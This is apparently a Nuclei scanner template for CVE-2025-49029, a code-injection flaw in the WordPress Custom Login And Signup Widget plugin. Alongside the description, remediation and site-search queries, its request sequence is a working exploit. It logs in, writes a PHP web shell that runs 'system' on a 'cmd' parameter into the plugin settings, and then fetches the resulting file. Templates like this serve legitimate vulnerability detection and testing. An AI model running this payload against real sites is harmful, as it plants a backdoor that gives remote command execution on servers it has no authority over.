id: CVE-2025-49029

info:
  name: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution
  author: pussycat0x
  severity: high
  description: |
    Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through 1.0
  impact: |
    Authenticated administrators can inject arbitrary PHP code through the plugin settings, potentially achieving remote code execution on the WordPress server.
  remediation: |
    Upgrade Custom Login And Signup Widget plugin to a version later than 1.0 that properly validates and sanitizes code input.
  reference:
    - https://github.com/Nxploited/CVE-2025-49029
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-login-and-signup-widget/custom-login-and-signup-widget-10-authenticated-administrator-remote-code-execution
  classification:
    epss-score: 0.02122
    epss-percentile: 0.79573
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/custom-login-and-signup-widget/"
    fofa-query: body="/wp-content/plugins/custom-login-and-signup-widget/"
  tags: cve,cve2025,wordpress,intrusive,plugin,wordpress-custom-login,file-upload,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}/wp-admin/options-general.php?page=custom-login-and-signup-widget
        Content-Type: application/x-www-form-urlencoded
        Origin: {{RootURL}}

        text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit

      - |
        GET /wp-content/plugins/custom-login-and-signup-widget/content/sn.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(body_2, "custom-login-and-signup-widget")
          - status_code_3 == 500
        condition: and
# digest: 4a0a00473045022100cf9943ae2076b33000e9fdebda71c774104db9e9b303368176ad38b11f33cd1a022028ad8c3ca2ab8831e9c32a4664938aea6ac32c8501c352be1bcd180e71027b87:922c64590222798bb761d5b6d8e72950